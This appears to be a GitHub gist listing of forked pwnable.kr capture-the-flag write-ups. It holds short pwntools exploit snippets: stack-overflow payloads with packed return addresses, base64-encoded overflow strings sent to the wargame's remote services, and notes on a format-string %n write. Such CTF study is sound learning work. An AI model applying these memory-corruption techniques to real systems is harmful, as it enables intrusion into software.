It has been a long time since I finish(nearly) these problems...
In linux, 0 is std_input, 1 is std_output, 2 is std_error_output.
We just need to send LETMEWIN to std_input and set fd to 0 which means (our input - 0x1234) == 0.
spnow
/ README.MD
Created
March 16, 2017 21:01
— forked from ihciah/README.MD
Pwnable.kr Toddler's Bottle writeup
spnow
/ pwnable.kr alloca(No ASLR) writeup.md
Created
March 16, 2017 21:00
— forked from parksjin01/pwnable.kr alloca(No ASLR) writeup.md
pwnable.kr alloca(No ASLR) writeup
from pwn import *
proc = process('alloca')
proc.sendline('-80')
proc.sendline('134525988'+',,,'+'\xab\x85\x04\x08')
proc.interactive()
spnow
/ README.MD
Created
March 16, 2017 20:59
— forked from ihciah/README.MD
Pwnable.kr tiny_easy writeup
Run the program and it crashed. Load it with gdb-peda, break at entry point and run:
0x8048054: pop eax
0x8048055: pop edx
0x8048056: mov edx,DWORD PTR [edx]
0x8048058: call edx
spnow
/ login_exp.py
Created
March 16, 2017 20:59
— forked from RickGray/login_exp.py
http://pwnable.kr/ [simple login]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding: utf-8 | |
| from pwn import * | |
| p = process('./login') | |
| ebp_over = 0x0811EB40 | |
| pp_system = 0x08049284 | |
| payload = b64e('A' * 4 + p32(pp_system) + p32(ebp_over)) |
spnow
/ pwnable.kr simple_login writeup.md
Created
March 16, 2017 20:58
— forked from parksjin01/pwnable.kr simple_login writeup.md
pwnable.kr simple_login writeup
from pwn import *
sh = remote('pwnable.kr', 9003)
sh.recv(1024)
sh.sendline('AAAA\x78\x92\x04\x08\x40\xeb\x11\x08'.encode('base64'))
a = sh.recv(10000)
a = a.split('\n')
print a[1]
sh.interactive()
spnow
/ README.MD
Created
March 16, 2017 20:58
— forked from ihciah/README.MD
Pwnable.kr simple login writeup
(Too lazy to review lessons before exam... Load with IDA and found:
_BOOL4 __cdecl auth(int a1)
{
char v2; // [sp+14h] [bp-14h]@1
char *s2; // [sp+1Ch] [bp-Ch]@1
spnow
/ bf_exp.py
Created
March 16, 2017 20:58
— forked from RickGray/bf_exp.py
http://pwnable.kr/ [brain fuck]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding: utf-8 | |
| from pwn import * | |
| # Remote EXP | |
| libc = ELF('./bf_libc.so') | |
| p = remote('pwnable.kr', 9001) | |
| # Local EXP |
spnow
/ hash_exp.py
Created
March 16, 2017 20:57
— forked from RickGray/hash_exp.py
http://pwnable.kr/ [md5 calculator]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding: utf-8 | |
| import os | |
| import re | |
| import time | |
| import random | |
| import urllib2 | |
| from pwn import * |
spnow
/ pwnable.kr dragon writeup.md
Created
March 16, 2017 20:57
— forked from parksjin01/pwnable.kr dragon writeup.md
pwnable.kr dragon writeup
from pwn import *
sh = remote('pwnable.kr', 9004)
sh.recv(10000)
sh.sendline('2')
sh.recv(10000)
for _ in range(3):
sh.sendline('1')
sh.recv(10000)
for _ in range(4):
spnow
/ README.MD
Created
March 16, 2017 20:56
— forked from ihciah/README.MD
Pwnable.kr fsb writeup
There are two ways to solve this problem. One is to pass the validation, and the other is to jump to execve. Since the first one is too time consuming, here I use the second one.
In function main, there is a alloca with random parameter, which will disturb the stack. So if we want to get information about the stack, we must leak it first.
In function fsb, there is a printf bug, and we can use %1$n to write any address. So we can just write an address, and use $ to get a reference, and we can write that address! However, all input is saved at .bss.
So we can consider another way. We can notice that the ebp is point to an old ebp, and we can control it.